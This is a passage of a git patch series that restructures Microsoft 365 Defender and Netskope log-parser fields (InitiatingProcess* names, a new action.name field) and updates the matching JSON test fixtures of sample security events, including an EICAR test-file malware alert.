"121834210", + "InitiatingProcessVersionInfoCompanyName": "Google", + "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool", + "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe", + "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe", + "InitiatingProcessVersionInfoProductName": "Software Reporter Tool", + "InitiatingProcessVersionInfoProductVersion": "102.286.200" }, "type": "NtAllocateVirtualMemoryApiCall" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_identity_directory.json b/Microsoft/microsoft-365-defender/tests/test_identity_directory.json index e45140956..7d110bb54 100644 --- a/Microsoft/microsoft-365-defender/tests/test_identity_directory.json +++ b/Microsoft/microsoft-365-defender/tests/test_identity_directory.json @@ -16,18 +16,16 @@ "@timestamp": "2022-09-01T07:09:47.498056Z", "action": { "properties": { - "process": { - "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", - "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", - "FileSize": 14687048, - "LogonId": "121834210", - "VersionInfoCompanyName": "Google", - "VersionInfoFileDescription": "Software Reporter Tool", - "VersionInfoInternalFileName": "software_reporter_tool_exe", - "VersionInfoOriginalFileName": "software_reporter_tool.exe", - "VersionInfoProductName": "Software Reporter Tool", - "VersionInfoProductVersion": "102.286.200" - } + "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", + "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", + "InitiatingProcessFileSize": 14687048, + "InitiatingProcessLogonId": "121834210", + "InitiatingProcessVersionInfoCompanyName": "Google", + "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool", + "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe", + "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe", + "InitiatingProcessVersionInfoProductName": "Software Reporter Tool", + "InitiatingProcessVersionInfoProductVersion": "102.286.200" }, "type": "NtAllocateVirtualMemoryApiCall" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_identity_info.json b/Microsoft/microsoft-365-defender/tests/test_identity_info.json index f1753e2d7..0a0174b85 100644 --- a/Microsoft/microsoft-365-defender/tests/test_identity_info.json +++ b/Microsoft/microsoft-365-defender/tests/test_identity_info.json @@ -16,18 +16,16 @@ "@timestamp": "2022-09-01T07:09:47.498056Z", "action": { "properties": { - "process": { - "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", - "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", - "FileSize": 14687048, - "LogonId": "121834210", - "VersionInfoCompanyName": "Google", - "VersionInfoFileDescription": "Software Reporter Tool", - "VersionInfoInternalFileName": "software_reporter_tool_exe", - "VersionInfoOriginalFileName": "software_reporter_tool.exe", - "VersionInfoProductName": "Software Reporter Tool", - "VersionInfoProductVersion": "102.286.200" - } + "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", + "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", + "InitiatingProcessFileSize": 14687048, + "InitiatingProcessLogonId": "121834210", + "InitiatingProcessVersionInfoCompanyName": "Google", + "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool", + "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe", + "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe", + "InitiatingProcessVersionInfoProductName": "Software Reporter Tool", + "InitiatingProcessVersionInfoProductVersion": "102.286.200" }, "type": "NtAllocateVirtualMemoryApiCall" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_identity_logon.json b/Microsoft/microsoft-365-defender/tests/test_identity_logon.json index 3e55ad2b0..6077ecfdc 100644 --- a/Microsoft/microsoft-365-defender/tests/test_identity_logon.json +++ b/Microsoft/microsoft-365-defender/tests/test_identity_logon.json @@ -16,18 +16,16 @@ "@timestamp": "2022-09-01T07:09:47.498056Z", "action": { "properties": { - "process": { - "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", - "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", - "FileSize": 14687048, - "LogonId": "121834210", - "VersionInfoCompanyName": "Google", - "VersionInfoFileDescription": "Software Reporter Tool", - "VersionInfoInternalFileName": "software_reporter_tool_exe", - "VersionInfoOriginalFileName": "software_reporter_tool.exe", - "VersionInfoProductName": "Software Reporter Tool", - "VersionInfoProductVersion": "102.286.200" - } + "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", + "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", + "InitiatingProcessFileSize": 14687048, + "InitiatingProcessLogonId": "121834210", + "InitiatingProcessVersionInfoCompanyName": "Google", + "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool", + "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe", + "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe", + "InitiatingProcessVersionInfoProductName": "Software Reporter Tool", + "InitiatingProcessVersionInfoProductVersion": "102.286.200" }, "type": "NtAllocateVirtualMemoryApiCall" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_identity_query.json b/Microsoft/microsoft-365-defender/tests/test_identity_query.json index 55684497d..f33a1eb87 100644 --- a/Microsoft/microsoft-365-defender/tests/test_identity_query.json +++ b/Microsoft/microsoft-365-defender/tests/test_identity_query.json @@ -16,18 +16,16 @@ "@timestamp": "2022-09-01T07:09:47.498056Z", "action": { "properties": { - "process": { - "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", - "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", - "FileSize": 14687048, - "LogonId": "121834210", - "VersionInfoCompanyName": "Google", - "VersionInfoFileDescription": "Software Reporter Tool", - "VersionInfoInternalFileName": "software_reporter_tool_exe", - "VersionInfoOriginalFileName": "software_reporter_tool.exe", - "VersionInfoProductName": "Software Reporter Tool", - "VersionInfoProductVersion": "102.286.200" - } + "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", + "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", + "InitiatingProcessFileSize": 14687048, + "InitiatingProcessLogonId": "121834210", + "InitiatingProcessVersionInfoCompanyName": "Google", + "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool", + "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe", + "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe", + "InitiatingProcessVersionInfoProductName": "Software Reporter Tool", + "InitiatingProcessVersionInfoProductVersion": "102.286.200" }, "type": "NtAllocateVirtualMemoryApiCall" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_local_ip.json b/Microsoft/microsoft-365-defender/tests/test_local_ip.json index 5a6e54961..3cedbfdb3 100644 --- a/Microsoft/microsoft-365-defender/tests/test_local_ip.json +++ b/Microsoft/microsoft-365-defender/tests/test_local_ip.json @@ -16,18 +16,16 @@ "@timestamp": "2022-09-01T07:09:47.498056Z", "action": { "properties": { - "process": { - "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", - "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", - "FileSize": 14687048, - "LogonId": "121834210", - "VersionInfoCompanyName": "Google", - "VersionInfoFileDescription": "Software Reporter Tool", - "VersionInfoInternalFileName": "software_reporter_tool_exe", - "VersionInfoOriginalFileName": "software_reporter_tool.exe", - "VersionInfoProductName": "Software Reporter Tool", - "VersionInfoProductVersion": "102.286.200" - } + "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", + "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", + "InitiatingProcessFileSize": 14687048, + "InitiatingProcessLogonId": "121834210", + "InitiatingProcessVersionInfoCompanyName": "Google", + "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool", + "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe", + "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe", + "InitiatingProcessVersionInfoProductName": "Software Reporter Tool", + "InitiatingProcessVersionInfoProductVersion": "102.286.200" }, "type": "NtAllocateVirtualMemoryApiCall" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_process_error.json b/Microsoft/microsoft-365-defender/tests/test_process_error.json index 9304ca1cb..2f5082094 100644 --- a/Microsoft/microsoft-365-defender/tests/test_process_error.json +++ b/Microsoft/microsoft-365-defender/tests/test_process_error.json @@ -22,14 +22,10 @@ "@timestamp": "2024-09-24T14:18:11.864114Z", "action": { "properties": { - "LogonId": "0", - "process": { - "parent": { - "CommandLine": "/usr/test/platform-python /usr/lib/python3.6/run.py --register", - "FileSize": 11864, - "LogonId": "0" - } - } + "InitiatingProcessCommandLine": "/usr/test/platform-python /usr/lib/python3.6/run.py --register", + "InitiatingProcessFileSize": 11864, + "InitiatingProcessLogonId": "0", + "LogonId": "0" }, "type": "ProcessCreated" }, From c1d52ac1ccb3dd44390361ce5806be9a8d31570c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?L=C3=A9na=C3=AFg?= <126670263+LenaigKaliou@users.noreply.github.com> Date: Thu, 28 Nov 2024 09:40:42 +0100 Subject: [PATCH 75/84] Update Netskope/netskope_events/ingest/parser.yml MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Co-authored-by: Sébastien Quioc --- Netskope/netskope_events/ingest/parser.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/Netskope/netskope_events/ingest/parser.yml b/Netskope/netskope_events/ingest/parser.yml index 7ce3a2543..b4606f079 100644 --- a/Netskope/netskope_events/ingest/parser.yml +++ b/Netskope/netskope_events/ingest/parser.yml @@ -36,7 +36,8 @@ stages: "@timestamp": "{{parse_date.datetime}}" observer.vendor: "Netskope" event.dataset: "{{parsed_event.message.type}}" - event.action: "{{parsed_event.message.action or parsed_event.message.activity or 'Allow'}}" + event.action: "{{parsed_event.message.activity}}" + action.name: "{{parsed_event.message.action or 'Allow'}}" event.reason: "{{parsed_event.message.audit_log_event or parsed_event.message.bypass_reason}}" event.duration: "{{parsed_event.message.conn_duration}}" user_agent.original: "{{parsed_event.message.user_agent}}" From bbb2d8c5d99a2b154a4a8aeb127d12968cbc8b97 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Thu, 28 Nov 2024 09:46:49 +0100 Subject: [PATCH 76/84] Fixing tests --- .../tests/test_audit_log_deleted_inline_policy.json | 4 +++- .../tests/test_audit_log_edit_admin_record.json | 4 +++- .../netskope_events/tests/test_audit_log_login_failed.json | 4 +++- .../tests/test_audit_log_login_successful.json | 4 +++- .../tests/test_audit_log_logout_successful.json | 4 +++- .../tests/test_audit_log_password_change_successful.json | 4 +++- Netskope/netskope_events/tests/test_connection_log.json | 4 +++- Netskope/netskope_events/tests/test_dlp_incident.json | 3 +++ Netskope/netskope_events/tests/test_malware_alert.json | 5 ++++- Netskope/netskope_events/tests/test_nspolicy_block.json | 5 ++++- Netskope/netskope_events/tests/test_nspolicy_log.json | 3 +++ Netskope/netskope_events/tests/test_nspolicy_upload.json | 3 +++ Netskope/netskope_events/tests/test_user_alert.json | 5 ++++- 13 files changed, 42 insertions(+), 10 deletions(-) diff --git a/Netskope/netskope_events/tests/test_audit_log_deleted_inline_policy.json b/Netskope/netskope_events/tests/test_audit_log_deleted_inline_policy.json index df70ea26e..c564471d7 100644 --- a/Netskope/netskope_events/tests/test_audit_log_deleted_inline_policy.json +++ b/Netskope/netskope_events/tests/test_audit_log_deleted_inline_policy.json @@ -5,7 +5,6 @@ "expected": { "message": "{\n \"timestamp\": 1651451341,\n \"type\": \"admin_audit_logs\",\n \"user\": \"john.doe@example.org\",\n \"severity_level\": 2,\n \"audit_log_event\": \"Deleted inline policy\",\n \"supporting_data\": {\n \"data_type\": \"policy\",\n \"data_values\": [\n false\n ]\n },\n \"organization_unit\": \"\",\n \"ur_normalized\": \"john.doe@example.org\",\n \"ccl\": \"unknown\",\n \"count\": 1,\n \"_id\": \"acfa7348-64c5-40de-b28d-202c8362d0f7\",\n \"userPrincipalName\": \"\",\n \"sAMAccountName\": \"\"\n}\n", "event": { - "action": "Allow", "category": [ "configuration" ], @@ -17,6 +16,9 @@ ] }, "@timestamp": "2022-05-02T00:29:01Z", + "action": { + "name": "Allow" + }, "netskope": { "events": { "action": { diff --git a/Netskope/netskope_events/tests/test_audit_log_edit_admin_record.json b/Netskope/netskope_events/tests/test_audit_log_edit_admin_record.json index 10b406a5f..952e5c0b6 100644 --- a/Netskope/netskope_events/tests/test_audit_log_edit_admin_record.json +++ b/Netskope/netskope_events/tests/test_audit_log_edit_admin_record.json @@ -5,7 +5,6 @@ "expected": { "message": "{\n \"timestamp\": 1651489787,\n \"type\": \"admin_audit_logs\",\n \"user\": \"john.doe@example.org\",\n \"severity_level\": 1,\n \"audit_log_event\": \"Edit admin record\",\n \"supporting_data\": {\n \"data_type\": \"admin\",\n \"data_values\": [\n \"admin@example.org\"\n ]\n },\n \"organization_unit\": \"\",\n \"ur_normalized\": \"john.doe@example.org\",\n \"ccl\": \"unknown\",\n \"count\": 1,\n \"_id\": \"275a263c8f8d4b7d9e12bf65b9094116\",\n \"userPrincipalName\": \"\",\n \"sAMAccountName\": \"\"\n}\n", "event": { - "action": "Allow", "category": [ "configuration" ], @@ -17,6 +16,9 @@ ] }, "@timestamp": "2022-05-02T11:09:47Z", + "action": { + "name": "Allow" + }, "netskope": { "events": { "action": { diff --git a/Netskope/netskope_events/tests/test_audit_log_login_failed.json b/Netskope/netskope_events/tests/test_audit_log_login_failed.json index 8a792a408..05b0456e2 100644 --- a/Netskope/netskope_events/tests/test_audit_log_login_failed.json +++ b/Netskope/netskope_events/tests/test_audit_log_login_failed.json @@ -5,7 +5,6 @@ "expected": { "message": "{\n \"timestamp\": 1651494031,\n \"type\": \"admin_audit_logs\",\n \"user\": \"student13\",\n \"severity_level\": 1,\n \"audit_log_event\": \"Login Failed\",\n \"supporting_data\": {\n \"data_type\": \"user\",\n \"data_values\": [\n \"4.5.6.7\",\n \"student13\"\n ]\n },\n \"organization_unit\": \"\",\n \"ur_normalized\": \"student13\",\n \"ccl\": \"unknown\",\n \"count\": 1,\n \"_id\": \"60d81a80b26149b8a910dfffc48cbf41\",\n \"userPrincipalName\": \"\",\n \"sAMAccountName\": \"\"\n}\n", "event": { - "action": "Allow", "category": [ "authentication" ], @@ -17,6 +16,9 @@ ] }, "@timestamp": "2022-05-02T12:20:31Z", + "action": { + "name": "Allow" + }, "netskope": { "events": { "action": { diff --git a/Netskope/netskope_events/tests/test_audit_log_login_successful.json b/Netskope/netskope_events/tests/test_audit_log_login_successful.json index 01549d366..cf808efde 100644 --- a/Netskope/netskope_events/tests/test_audit_log_login_successful.json +++ b/Netskope/netskope_events/tests/test_audit_log_login_successful.json @@ -5,7 +5,6 @@ "expected": { "message": "{\n \"timestamp\": 1671727087,\n \"type\": \"admin_audit_logs\",\n \"user\": \"john.doe@example.org\",\n \"severity_level\": 2,\n \"audit_log_event\": \"Login Successful\",\n \"supporting_data\": {\n \"data_type\": \"user\",\n \"data_values\": [\n \"1.2.3.4\",\n \"john.doe@example.org\"\n ]\n },\n \"organization_unit\": \"\",\n \"ur_normalized\": \"john.doe@example.org\",\n \"ccl\": \"unknown\",\n \"count\": 1,\n \"_id\": \"45b78fd638944e9ca0c6d92dfe2d4815\",\n \"userPrincipalName\": \"\",\n \"sAMAccountName\": \"\"\n}\n", "event": { - "action": "Allow", "category": [ "authentication" ], @@ -17,6 +16,9 @@ ] }, "@timestamp": "2022-12-22T16:38:07Z", + "action": { + "name": "Allow" + }, "netskope": { "events": { "action": { diff --git a/Netskope/netskope_events/tests/test_audit_log_logout_successful.json b/Netskope/netskope_events/tests/test_audit_log_logout_successful.json index 12e39be95..fb06271d6 100644 --- a/Netskope/netskope_events/tests/test_audit_log_logout_successful.json +++ b/Netskope/netskope_events/tests/test_audit_log_logout_successful.json @@ -5,7 +5,6 @@ "expected": { "message": "{\n \"timestamp\": 1670409967,\n \"type\": \"admin_audit_logs\",\n \"user\": \"john.doe@example.org\",\n \"severity_level\": 2,\n \"audit_log_event\": \"Logout Successful\",\n \"supporting_data\": {\n \"data_type\": \"reason\",\n \"data_values\": [\n \"Logged out due to inactivity\"\n ]\n },\n \"organization_unit\": \"\",\n \"ur_normalized\": \"john.doe@example.org\",\n \"ccl\": \"unknown\",\n \"count\": 1,\n \"_id\": \"e0272abae25442f681d0dbbef65b67e9\",\n \"userPrincipalName\": \"\",\n \"sAMAccountName\": \"\"\n}\n", "event": { - "action": "Allow", "category": [ "authentication" ], @@ -17,6 +16,9 @@ ] }, "@timestamp": "2022-12-07T10:46:07Z", + "action": { + "name": "Allow" + }, "netskope": { "events": { "action": { diff --git a/Netskope/netskope_events/tests/test_audit_log_password_change_successful.json b/Netskope/netskope_events/tests/test_audit_log_password_change_successful.json index a2fa885de..667c5755e 100644 --- a/Netskope/netskope_events/tests/test_audit_log_password_change_successful.json +++ b/Netskope/netskope_events/tests/test_audit_log_password_change_successful.json @@ -5,7 +5,6 @@ "expected": { "message": "{\n \"timestamp\": 1651489787,\n \"type\": \"admin_audit_logs\",\n \"user\": \"john.doe@example.org\",\n \"severity_level\": 1,\n \"audit_log_event\": \"Password Change Successful\",\n \"supporting_data\": {\n \"data_type\": \"user\",\n \"data_values\": [\n \"1.2.3.4\",\n \"admin@example.org\"\n ]\n },\n \"organization_unit\": \"\",\n \"ur_normalized\": \"john.doe@example.org\",\n \"ccl\": \"unknown\",\n \"count\": 1,\n \"_id\": \"47e7e59a6ffa4662be63836a0f898b16\",\n \"userPrincipalName\": \"\",\n \"sAMAccountName\": \"\"\n}\n", "event": { - "action": "Allow", "category": [ "iam" ], @@ -17,6 +16,9 @@ ] }, "@timestamp": "2022-05-02T11:09:47Z", + "action": { + "name": "Allow" + }, "netskope": { "events": { "action": { diff --git a/Netskope/netskope_events/tests/test_connection_log.json b/Netskope/netskope_events/tests/test_connection_log.json index 5c5218356..996cd6263 100644 --- a/Netskope/netskope_events/tests/test_connection_log.json +++ b/Netskope/netskope_events/tests/test_connection_log.json @@ -5,7 +5,6 @@ "expected": { "message": "{\n \"_id\": \"69573873d4de0a4f1d2cbac4\",\n \"access_method\": \"Client\",\n \"app\": \"Swile\",\n \"appcategory\": \"HR\",\n \"bypass_reason\": \"SSL Do Not Decrypt Bypass Policy Matched\",\n \"bypass_traffic\": \"yes\",\n \"category\": \"HR\",\n \"cci\": 16,\n \"ccl\": \"poor\",\n \"connection_id\": 0,\n \"count\": 1,\n \"domain\": \"test.example.org\",\n \"dst_country\": \"FR\",\n \"dst_geoip_src\": 1,\n \"dst_latitude\": 48.85836410522461,\n \"dst_location\": \"Paris\",\n \"dst_longitude\": 2.294532060623169,\n \"dst_region\": \"Ile-de-France\",\n \"dst_timezone\": \"Europe/Paris\",\n \"dst_zipcode\": \"N/A\",\n \"dstip\": \"5.6.7.8\",\n \"dstport\": 443,\n \"netskope_pop\": \"FR-PAR1\",\n \"organization_unit\": \"\",\n \"other_categories\": [\n \"Finance/Accounting\",\n \"All Categories\",\n \"HR\"\n ],\n \"page\": \"test.example.org\",\n \"policy\": \"bypass_ssl for regulation purpose\",\n \"request_id\": 1111111111111111111,\n \"site\": \"Swile\",\n \"src_country\": \"FR\",\n \"src_geoip_src\": 2,\n \"src_latitude\": 48.11,\n \"src_location\": \"Rennes\",\n \"src_longitude\": -1.6744,\n \"src_region\": \"Brittany\",\n \"src_time\": \"Wed Dec 21 17:12:00 2022\",\n \"src_timezone\": \"Europe/Paris\",\n \"src_zipcode\": \"35000\",\n \"srcip\": \"4.5.6.7\",\n \"ssl_decrypt_policy\": \"yes\",\n \"timestamp\": 1671639140,\n \"traffic_type\": \"CloudApp\",\n \"transaction_id\": 0,\n \"type\": \"connection\",\n \"ur_normalized\": \"john.doe@example.org\",\n \"url\": \"test.example.org\",\n \"user\": \"john.doe@example.org\",\n \"user_generated\": \"yes\",\n \"userip\": \"1.2.3.4\",\n \"userkey\": \"john.doe@example.org\",\n \"org\": \"\",\n \"http_transaction_count\": 0,\n \"network\": \"\",\n \"useragent\": \"\",\n \"dsthost\": \"\",\n \"numbytes\": 0,\n \"CononicalName\": \"\",\n \"os_version\": \"\",\n \"browser_session_id\": 0,\n \"resp_cnt\": 0,\n \"log_file_name\": \"\",\n \"suppression_end_time\": 0,\n \"browser_version\": \"\",\n \"severity\": \"\",\n \"client_bytes\": 0,\n \"suppression_start_time\": 0,\n \"app_session_id\": 0,\n \"sAMAccountName\": \"\",\n \"req_cnt\": 0,\n \"device\": \"\",\n \"browser\": \"\",\n \"userPrincipalName\": \"\",\n \"conn_endtime\": 1671639139,\n \"conn_duration\": 3,\n \"protocol\": \"\",\n \"fromlogs\": \"\",\n \"serial\": \"\",\n \"resp_content_len\": 0,\n \"dynamic_classification\": \"\",\n \"hostname\": \"\",\n \"os\": \"\",\n \"server_bytes\": 0,\n \"conn_starttime\": 1671639136,\n \"sessionid\": \"\",\n \"resp_content_type\": \"\"\n}\n", "event": { - "action": "Allow", "category": [ "network" ], @@ -20,6 +19,9 @@ ] }, "@timestamp": "2022-12-21T16:12:20Z", + "action": { + "name": "Allow" + }, "destination": { "address": "5.6.7.8", "bytes": 0, diff --git a/Netskope/netskope_events/tests/test_dlp_incident.json b/Netskope/netskope_events/tests/test_dlp_incident.json index 37ab6e32b..b3cb772d3 100644 --- a/Netskope/netskope_events/tests/test_dlp_incident.json +++ b/Netskope/netskope_events/tests/test_dlp_incident.json @@ -16,6 +16,9 @@ ] }, "@timestamp": "2023-01-31T08:11:53Z", + "action": { + "name": "Allow" + }, "cloud": { "instance": { "id": "example.org" diff --git a/Netskope/netskope_events/tests/test_malware_alert.json b/Netskope/netskope_events/tests/test_malware_alert.json index 5e5f6de15..e1a0a66c5 100644 --- a/Netskope/netskope_events/tests/test_malware_alert.json +++ b/Netskope/netskope_events/tests/test_malware_alert.json @@ -5,7 +5,7 @@ "expected": { "message": "{\n \"_id\": \"882049056ee9e069c1c329b7\",\n \"access_method\": \"Client\",\n \"action\": \"Detection\",\n \"activity\": \"Download\",\n \"alert\": \"yes\",\n \"alert_type\": \"Malware\",\n \"app\": \"eicar\",\n \"app_session_id\": 111111111111111111,\n \"appcategory\": \"n/a\",\n \"browser\": \"Safari\",\n \"category\": \"n/a\",\n \"cci\": \"\",\n \"ccl\": \"unknown\",\n \"connection_id\": 0,\n \"count\": 1,\n \"device\": \"Mac Device\",\n \"dst_country\": \"US\",\n \"dst_geoip_src\": 2,\n \"dst_latitude\": 47.6711,\n \"dst_location\": \"Redmond\",\n \"dst_longitude\": -122.1253,\n \"dst_region\": \"Washington\",\n \"dst_timezone\": \"America/Los_Angeles\",\n \"dst_zipcode\": \"98073\",\n \"dstip\": \"5.6.7.8\",\n \"file_path\": \"NA\",\n \"file_size\": 308,\n \"file_type\": \"File Type Not Detected\",\n \"hostname\": \"MacBook Pro\",\n \"instance\": null,\n \"managementID\": \"99999999999999999999999999999999\",\n \"md5\": \"68b329da9893e34099c7d8ad5cb9c940\",\n \"mime_type\": \"\",\n \"nsdeviceuid\": \"BC848089-186A-4F2D-A26F-E5CC94C29E56\",\n \"object\": \"eicarcom2.zip\",\n \"object_id\": \"68b329da9893e34099c7d8ad5cb9c940\",\n \"object_type\": \"File\",\n \"organization_unit\": \"\",\n \"os\": \"Monterey\",\n \"referer\": \"https://www.eicar.org/\",\n \"request_id\": 2222222222222222222,\n \"severity\": \"high\",\n \"site\": \"eicar\",\n \"src_country\": \"FR\",\n \"src_geoip_src\": 2,\n \"src_latitude\": 48.11,\n \"src_location\": \"Rennes\",\n \"src_longitude\": -1.6744,\n \"src_region\": \"Brittany\",\n \"src_timezone\": \"Europe/Paris\",\n \"src_zipcode\": \"35000\",\n \"srcip\": \"4.3.2.1\",\n \"timestamp\": 1671631928,\n \"title\": \"eicarcom2.zip\",\n \"traffic_type\": \"CloudApp\",\n \"transaction_id\": 3333333333333333333,\n \"tss_mode\": \"inline\",\n \"type\": \"nspolicy\",\n \"ur_normalized\": \"john.doe@example.org\",\n \"url\": \"secure.eicar.org/eicarcom2.zip\",\n \"user\": \"john.doe@example.org\",\n \"user_id\": \"john.doe@example.org\",\n \"userip\": \"1.2.3.4\",\n \"userkey\": \"john.doe@example.org\",\n \"dlp_file\": \"\",\n \"data_center\": \"\",\n \"browser_version\": \"\",\n \"owner\": \"\",\n \"dlp_incident_id\": 0,\n \"channel_id\": \"\",\n \"from_user_category\": \"\",\n \"resp_cnt\": 0,\n \"suppression_key\": \"\",\n \"loginurl\": \"\",\n \"total_collaborator_count\": 0,\n \"os_version\": \"\",\n \"dlp_rule\": \"\",\n \"dlp_mail_parent_id\": \"\",\n \"instance_id\": \"\",\n \"to_user\": \"\",\n \"suppression_end_time\": 0,\n \"fromlogs\": \"\",\n \"dlp_parent_id\": 0,\n \"dstport\": 0,\n \"dst_timezone\": \"\",\n \"serial\": \"\",\n \"audit_category\": \"\",\n \"sha256\": \"\",\n \"from_user\": \"\",\n \"sAMAccountName\": \"\",\n \"app_activity\": \"\",\n \"useragent\": \"\",\n \"netskope_activity\": \"\",\n \"conn_duration\": 0,\n \"other_categories\": [],\n \"custom_connector\": \"\",\n \"dlp_rule_severity\": \"\",\n \"numbytes\": 0,\n \"telemetry_app\": \"\",\n \"true_obj_category\": \"\",\n \"userPrincipalName\": \"\",\n \"logintype\": \"\",\n \"suppression_start_time\": 0,\n \"browser_session_id\": 0,\n \"dlp_profile\": \"\",\n \"src_time\": \"\",\n \"modified\": 0,\n \"policy\": \"\",\n \"policy_id\": \"\",\n \"notify_template\": \"\",\n \"audit_type\": \"\",\n \"orignal_file_path\": \"\",\n \"dlp_is_unique_count\": \"\",\n \"org\": \"\",\n \"user_category\": \"\",\n \"dlp_unique_count\": 0,\n \"exposure\": \"\",\n \"netskope_pop\": \"\",\n \"shared_with\": \"\",\n \"client_bytes\": 0,\n \"sanctioned_instance\": \"\",\n \"device_classification\": \"\",\n \"data_type\": \"\",\n \"scan_type\": \"\",\n \"internal_collaborator_count\": 0,\n \"CononicalName\": \"\",\n \"workspace\": \"\",\n \"log_file_name\": \"\",\n \"parent_id\": \"\",\n \"true_obj_type\": \"\",\n \"dlp_rule_count\": 0,\n \"sessionid\": \"\",\n \"workspace_id\": \"\",\n \"page_site\": \"\",\n \"universal_connector\": \"\",\n \"server_bytes\": 0,\n \"req_cnt\": 0,\n \"file_lang\": \"\",\n \"protocol\": \"\",\n \"web_universal_connector\": \"\",\n \"dsthost\": \"\",\n \"appsuite\": \"\",\n \"managed_app\": \"\",\n \"page\": \"\"\n}\n", "event": { - "action": "Detection", + "action": "Download", "category": [ "malware" ], @@ -17,6 +17,9 @@ ] }, "@timestamp": "2022-12-21T14:12:08Z", + "action": { + "name": "Detection" + }, "destination": { "address": "5.6.7.8", "bytes": 0, diff --git a/Netskope/netskope_events/tests/test_nspolicy_block.json b/Netskope/netskope_events/tests/test_nspolicy_block.json index 0d739d4fd..404b5d4ab 100644 --- a/Netskope/netskope_events/tests/test_nspolicy_block.json +++ b/Netskope/netskope_events/tests/test_nspolicy_block.json @@ -11,7 +11,7 @@ "expected": { "message": "{\"_id\":\"55093de1d7b4571d8941f492\",\"access_method\":\"Client\",\"action\":\"block\",\"activity\":\"Browse\",\"alert\":\"yes\",\"app\":\"DNS Over 